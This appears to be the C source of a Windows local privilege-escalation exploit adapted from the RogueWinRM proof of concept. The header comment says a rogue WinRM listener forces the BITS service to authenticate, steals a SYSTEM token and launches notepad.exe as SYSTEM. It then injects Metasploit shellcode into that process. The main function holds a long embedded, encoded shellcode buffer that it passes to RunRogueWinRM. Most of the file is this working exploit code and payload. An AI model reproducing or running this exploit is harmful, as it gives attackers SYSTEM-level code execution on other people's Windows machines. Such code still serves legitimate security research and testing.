
/*
This is a privilege escalation exploit which launches an arbitrary process as the SYSTEM user.
It takes advantage of the BITS behavior which always tries to connect on port 5985 (Windows
Remote Management) even if there is no WinRM service listening on that port. This exploit
launches a rogue WinRM service which forces the BITS service to authenticate by sending it a 401
challenge response packet. The authentication allows stealing a SYSTEM token as a primary
token, and using it to launch an arbitrary process as SYSTEM.
In practice, this exploit launches notepad.exe as SYSTEM. Then, it copies the shellcode
received from metasploit into the remote SYSTEM process and makes it trigger its execution.
Details of the vulnerability are here:
https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
This exploit was developed from decoder's POC here:
https://github.com/antonioCoco/RogueWinRM
PREREQUISITES:
- Port 5985 must be free
- BITS must not be running
WARNING:
- As this exploit launches a service, a firewall popup may appear.
*/
#include "../Common_Src_Files/pch.h"
/*
 * Process entry point.
 *
 * Builds the packed payload buffer and hands it to RunRogueWinRM(); that
 * function's return value becomes the process exit code. argc/argv are
 * ignored: everything the program needs is embedded in the literal below.
 *
 * NOTE(review): the literal contains embedded NULs (after "47001", after
 * "notepad.exe", and after the four ASCII digits "1384"), so the callee
 * cannot measure it with strlen(). How RunRogueWinRM() recovers the buffer
 * layout and the payload length is defined in the common sources pulled in
 * by pch.h, not visible here -- confirm before changing the literal.
 */
int main(int argc, char** argv)
{
(void)argc;
(void)argv;
/* Automatic array: a writable per-call copy of the literal, NULs included. */
char shellcode[] = "47001\x00notepad.exe\x00\x31\x33\x38\x34\00\x48\x31\xc9\x48\x81\xe9\xa1\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x6c\xdd\xf4\xfa\xe9\x0d\x46\xb4\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x90\x95\x77\x1e\x19\xe5\x8a\xb4\x6c\xdd\xb5\xab\xa8\x5d\x14\xe5\x24\xec\x26\x9f\xa1\x86\x14\xd4\x3a\x95\x7f\xa8\xf1\x45\xcd\xe6\x4c\x95\x7f\x88\xb9\x45\x49\x03\x26\x97\xb9\xcb\x20\x45\x77\x74\xc0\xe1\x95\x86\xeb\x21\x66\xf5\xad\x14\xf9\xbb\xe8\xcc\xa4\x59\x3e\x9c\xa5\xb2\x62\x5f\x66\x3f\x2e\xe1\xbc\xfb\x39\x6b\xc7\xcc\x74\xd6\xf6\xf5\x6c\x7f\x46\xb4\x6c\x56\x74\x72\xe9\x0d\x46\xfc\xe9\x1d\x80\x9d\xa1\x0c\x96\xf0\xe7\x9d\xd4\xaa\xa0\x0c\x96\x3f\x24\xc5\x17\xac\xa4\x3c\x8f\xfc\x93\x14\xb5\x71\xdd\x85\x0e\xb5\xba\x95\xc5\x3a\x45\x4c\x87\x7d\x61\x9c\xf5\x3b\xd1\xed\x33\x45\x20\xde\xb8\xde\xe1\x48\x7f\x65\x19\x05\xac\xbe\x62\x4d\x62\xfd\x6d\x0d\x92\xbb\x62\x01\x0e\xf0\xe7\x9d\xe8\xb3\xe8\xdd\x07\x3f\x68\x55\xbc\xfb\x39\x4c\x1e\xf5\x34\x83\xad\xa0\xa8\x55\x07\xed\x2d\x87\xbc\x79\x05\x2d\x07\xe6\x93\x3d\xac\xbb\xb0\x57\x0e\x3f\x7e\x34\xbf\x05\x16\xf2\x1b\xfc\x5d\x06\xa7\xb3\x57\x7a\x2f\xda\x05\xb3\x91\x8e\xe9\x4c\x10\xfc\xe5\x3c\xbd\x3d\x2b\x41\x31\x92\x6b\x22\x21\xa9\xba\x45\xcf\x55\x3f\x87\xb9\xcb\x29\x40\x77\x7d\x3f\x8e\xbd\x40\xd3\x5b\x3f\x13\x6c\xdd\xf4\xfa\x16\xd8\xae\xb9\x6c\xdd\xf4\xcb\xd0\x3f\x68\x85\x5a\xe5\xda\xcb\xc7\x3e\x72\xb4\x36\x95\x7d\x3b\xa0\xca\x86\x08\x6d\xdd\xf4\xb7\xd8\xc4\x15\xe7\x06\xde\xa7\xb3\x53\x5a\xcf\x2b\xaa\xdd\xf4\xfa\xe9\xf2\x93\x5c\xa0\xdd\xf4\xfa\xc6\x48\x71\xd8\x5a\xb5\xb1\xca\xb3\x3f\x02\xcc\x0f\x9b\xc5\xca\xbf\x4c\x7f\xda\x06\xb4\xb5\xcc\xaa\x64\x11\xde\x1e\x8b\xad\xbf\xdb\x7c\x21\xd2\x06\xae\xa6\x90\x88\x54\x0c\xdc\x2b\x95\xc1\xb5\xa5\x62\x20\xcd\x16\x87\xa4\x9c\xdf\x49\x02\xee\x55\xb9\xa1\xc2\xbc\x43\x0c\xc2\x3f\xa5\x92\xd7\x99\x44\x3c\xf5\x08\xe9\xa1\x9c\x86\x67\x33\xda\x55\xe9\xcd\xac\x8e\x6e\x2e\xfe\x04\x91\x9f\xb2\xb1\x67\x37\xcd\x3f\xb1\xa4\xa0\x9a\x47\x0b\xeb\x1f\x97\xb0\x8d\xab\x4e\x70\xc1\x36\xb0\xc7\xa3\xc4\
x6f\x21\xd6\x54\xf0\xab\x9c\xc4\x4c\x32\xdb\x20\xed\x91\xb1\x86\x3d\x27\xde\x2f\x9a\x90\xa9\xb9\x78\x0d\xd9\x0f\xa8\xc4\x94\xa7\x6e\x6b\xfd\x5c\x97\x97\x82\x9c\x77\x13\xfe\x02\x94\x99\xcb\xa1\x7e\x76\x83\x5e\x99\x82\x82\x8a\x3a\x3c\x87\x34\x8d\xb0\xaa\xba\x66\x75\x8c\x5e\xab\xbe\xb9\x8f\x47\x33\x83\x3b\xf0\x97\x82\x9f\x49\x14\xb4\x24\x54\x35\xa9\xb3\x4c\x1e\xf9\x5d\x14\xa7\xb2\x51\x0d\x74\x1c\xe8\xdd\xf4\xfa\xe9\x5d\x15\xe7\x25\x1a\x36\x11\xbc\x23\x7d\x4b\xb9\x95\x7d\x3c\x83\x07\x19\xfc\xe5\x2c\x9e\xe5\xb3\x5f\x2e\x34\x5f\xdd\xf4\xb3\x60\xed\x2c\xb0\x2d\x84\xbd\x40\x9c\x4b\xd8\x32\x6c\xdd\xf4\xfa\x16\xd8\x0b\x85\xac\x8e\xae\xb2\x60\xfc\x0b\x85\xa5\x90\xc5\x33\xba\x5e\x0f\x73\xae\xf0\xf2\xe2\x92\xf2\x93\x31\xac\xa8\xeb\xb2\x2e\xcc\xce\xa7\x6c\xdd\xbd\x40\xad\xfd\x73\x54\x6c\xdd\xf4\xfa\x16\xd8\x0e\x4b\xa3\xa9\xf6\x11\x43\xe5\x13\xb4\x6c\xdd\xa7\xa3\x83\x4d\x1c\xfd\xe5\x0c\x35\x18\xf9\x44\x81\x74\x6c\xcd\xf4\xfa\xa0\xb7\x1e\x10\x3f\x38\xf4\xfa\xe9\x0d\xb9\x61\x24\x4e\xa7\xa9\xa1\x84\xa1\xfc\xe5\x2c\xbc\x73\x33\x44\x81\x74\x6c\xfd\xf4\xfa\xa0\x84\xbf\xfd\xd6\xcf\x62\x73\x0b\x0d\x46\xb4\x6c\x22\x21\xb2\x6a\xc9\x66\x31\xac\xa9\x46\x9c\x62\x0a\x0e\xb5\xaf\x58\x34\x8f\x3b\x55\x85\xec\x06\xdd\xad\xb3\x2e\xcf\xb6\x01\xce\x8b\x0b\x2f\xe9\x0d\x46\xb4";
/* dprintf: presumably the project's debug-logging macro from pch.h. */
dprintf("[main] Entry point.");
/* The callee's status is the exit code; no intermediate variable needed. */
return RunRogueWinRM(shellcode);
}